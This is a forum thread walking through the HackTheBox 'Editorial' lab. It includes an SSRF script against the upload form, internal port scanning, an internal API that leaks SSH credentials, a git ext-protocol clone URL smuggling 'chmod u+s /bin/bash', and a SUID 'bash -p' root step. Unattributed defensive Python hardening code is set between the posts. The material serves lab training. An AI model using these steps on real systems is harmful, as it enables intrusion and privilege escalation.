HTB - Editorial
by paven - Saturday June 15, 2024 at 05:48 PM
#51
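#!/bin/bash

# First argument: the URL to place in the bookurl form field
URL="$1"

# Submit the form; the response body is used below as the path to request
OUT=$(curl -s -F "bookurl=$URL" -F "bookfile=@/dev/null" http://editorial.htb/upload-cover)

curl -s "http://editorial.htb/$OUT"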
#52
(Jun 15, 2024, 08:46 PM)BahsbFAISfjhb Wrote:
{
  "messages": [
    {
      "promotions": {
        "description": "Retrieve a list of all the promotions in our library.",
        "endpoint": "/api/latest/metadata/messages/promos",
        "methods": "GET"
      }
    },
    {
      "coupons": {
        "description": "Retrieve the list of coupons to use in our library.",
        "endpoint": "/api/latest/metadata/messages/coupons",
        "methods": "GET"
      }
    },
    {
      "new_authors": {
        "description": "Retrieve the welcome message sended to our new authors.",
        "endpoint": "/api/latest/metadata/messages/authors",
        "methods": "GET"
      }
    },
    {
      "platform_use": {
        "description": "Retrieve examples of how to use the platform.",
        "endpoint": "/api/latest/metadata/messages/how_to_use_platform",
        "methods": "GET"
      }
    }
  ],
  "version": [
    {
      "changelog": {
        "description": "Retrieve a list of all the versions and updates of the api.",
        "endpoint": "/api/latest/metadata/changelog",
        "methods": "GET"
      }
    },
    {
      "latest": {
        "description": "Retrieve the last version of api.",
        "endpoint": "/api/latest/metadata",
        "methods": "GET"
      }
    }
  ]
}
I got these APIs. How do I use this /api/latest/metadata/messages/authors endpoint?

(Jun 15, 2024, 08:55 PM)ritualist Wrote: Check http://127.0.0.1:5000/api/latest/metadat...es/authors for ssh credentials

Where are you using this endpoint to get the credentials?
#53
How do you know that port 5000 is open on the inside of the box?
Where did you find the api?
#54
Internal scanning reveals port 5000 and the API endpoint.

Here is a reference article: https://cyberweapons.medium.com/internal...248ae6fa7b
Thanks @paw for the rank!!
#55
Getting these error messages

"Sorry, user prod is not allowed to execute '/usr/bin/python3 /opt/internal_apps/clone_changes/clone_prod_change.py' as root on editorial."

"Traceback (most recent call last):
  File "/opt/internal_apps/clone_changes/clone_prod_change.py", line 12, in <module>
    r.clone_from(url_to_clone, 'new_changes', multi_options=["-c protocol.ext.allow=always"])
  File "/usr/local/lib/python3.10/dist-packages/git/repo/base.py", line 1275, in clone_from
    return cls._clone(git, url, to_path, GitCmdObjectDB, progress, multi_options, **kwargs)
  File "/usr/local/lib/python3.10/dist-packages/git/repo/base.py", line 1194, in _clone
    finalize_process(proc, stderr=stderr)
  File "/usr/local/lib/python3.10/dist-packages/git/util.py", line 419, in finalize_process
    proc.wait(**kwargs)
  File "/usr/local/lib/python3.10/dist-packages/git/cmd.py", line 559, in wait
    raise GitCommandError(remove_password_if_present(self.args), status, errstr)
git.exc.GitCommandError: Cmd('git') failed due to: exit code(128)
cmdline: git clone -v -c protocol.ext.allow=always ext:Confusedh -c chmod% u+s% /bin/bash new_changes
stderr: 'Cloning into 'new_changes'...
fatal: Could not read from remote repository.

Please make sure you have the correct access rights
and the repository exists."
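The traceback above shows the clone script handing git a caller-supplied URL together with `-c protocol.ext.allow=always`. As an added example (not code from the box or from any poster), this is one way to harden that call: validate the URL first and build a git command line that allows only named transports. The function names, the https/ssh allowlist and the sample URLs are assumptions.

```python
import re
from urllib.parse import urlsplit

ALLOWED_SCHEMES = ("https", "ssh")                  # assumption: the only transports needed
HELPER_SYNTAX = re.compile(r"^[A-Za-z0-9+.-]+::")   # git's <transport>::<address> form

def validate_clone_url(url):
    """Raise ValueError unless url is a plain https:// or ssh:// repository URL."""
    if not url or url.startswith("-"):
        raise ValueError("empty URL or option-like argument")
    if HELPER_SYNTAX.match(url):
        raise ValueError("remote-helper syntax is not accepted")
    if any(ch.isspace() or ord(ch) < 0x20 for ch in url):
        raise ValueError("whitespace or control characters in URL")
    parts = urlsplit(url)
    if parts.scheme not in ALLOWED_SCHEMES:          # also rejects file:// and scp-style paths
        raise ValueError(f"scheme {parts.scheme!r} is not allowed")
    if not parts.hostname:
        raise ValueError("URL has no host")
    return url

def build_clone_argv(url, dest="new_changes"):
    """Hardened git argv: deny every protocol, then re-enable only the allowlist."""
    url = validate_clone_url(url)
    argv = ["git", "-c", "protocol.allow=never"]
    for scheme in ALLOWED_SCHEMES:
        argv += ["-c", f"protocol.{scheme}.allow=always"]
    return argv + ["clone", "--", url, dest]         # "--" ends option parsing

def rejected(url):
    """Return the rejection reason for url, or None if it is accepted."""
    try:
        validate_clone_url(url)
    except ValueError as exc:
        return str(exc)
    return None
```

The argv is meant for `subprocess.run(argv, check=True)` without a shell; a sudo rule that lets a low-privileged user choose the URL should sit behind the same validation.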
#56
Where do you find it? Is it here like this? /static/images/unsplash_photo_1630734277837_ebe62757b6e0.jpeg/?url=http://127.0.0.1:5000

#57
If you are looking for the API endpoint:

- Add URL: http://127.0.0.1:5000
- Click preview
- Right click on the corrupted image preview
- Open in a new tab, F12 and check the network tab, response
- You can find the endpoint

https://prnt.sc/ErKAaP4ZW3NK
https://prnt.sc/AitDHo1aBGLy

Or learn to use Burp.

And if you are wondering about the port, it's basic internal network scanning with Burp Suite. You have the option to add a URL on the /upload page.
Do a basic Intruder attack on the port number and check the responses to see if you can find anything odd.
For example: https://prnt.sc/pC17U2iUR75r
Here I have used numbers as the payload, but you can add your custom list of ports. If you check the content length, you will find that it is different from the rest of the requests.
Here is how I added the payload position: https://prnt.sc/PN5y1zBMPgv9
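The posts above rely on the upload page fetching whatever URL it is given, including http://127.0.0.1:5000. As an added example (not code from the box or from any poster), this is a server-side check that refuses such a URL before any preview fetch is made. The function names, the port allowlist and the sample hosts are assumptions.

```python
import ipaddress
import socket
from urllib.parse import urlsplit

ALLOWED_PORTS = {"http": {80}, "https": {443}}   # assumption: covers are served on web ports

def resolve_all(host):
    """Default resolver: every address the name currently maps to."""
    infos = socket.getaddrinfo(host, None, proto=socket.IPPROTO_TCP)
    return sorted({info[4][0] for info in infos})

def check_cover_url(url, resolver=resolve_all):
    """Return (ok, reason, addrs); the fetcher must connect only to one of addrs."""
    try:
        parts = urlsplit(url)
        port = parts.port                         # raises ValueError on a bad port
    except ValueError:
        return False, "malformed URL", []
    allowed = ALLOWED_PORTS.get(parts.scheme)
    if allowed is None:
        return False, "scheme not allowed", []
    if not parts.hostname or parts.username or parts.password:
        return False, "missing host or embedded credentials", []
    if port is not None and port not in allowed:
        return False, "port not allowed", []
    try:
        addrs = resolver(parts.hostname)
    except (OSError, UnicodeError):
        addrs = []
    if not addrs:
        return False, "host does not resolve", []
    for addr in addrs:
        ip = ipaddress.ip_address(addr.split("%")[0])   # drop any IPv6 zone id
        if ip.version == 6 and ip.ipv4_mapped:
            ip = ip.ipv4_mapped                         # ::ffff:127.0.0.1 -> 127.0.0.1
        if not ip.is_global:                            # loopback, private, link-local, ...
            return False, f"{addr} is not a public address", []
    return True, "ok", addrs
```

The check only helps if the fetch then connects to one of the returned addresses and does not follow redirects; resolving the name a second time at fetch time reopens the hole.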
#58
For root:

find / -perm -4000 2>/dev/null

You will see /bin/bash, then:

bash -p
#59
Note that Intruder is slow on Burp Community Edition; you may need Burp Pro for faster results. Alternatively, you can also use tools such as ffuf to do the same.
#60
I recreated all that, but still can't get the info from http://127.0.0.1:5000/api/latest/metadat...es/authors, this is my request:

GET /static/images/unsplash_photo_1630734277837_ebe62757b6e0.jpeg?url=http://127.0.0.1:5000/api/latest/metadata/messages/authors HTTP/1.1
Host: editorial.htb
If-Modified-Since: Tue, 16 Jan 2024 19:46:20 GMT
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.6367.60 Safari/537.36
If-None-Match: "1705434380.876186-17343-590159124"
Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
Referer: http://editorial.htb/upload
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Connection: close

I am getting a 304 Not Modified error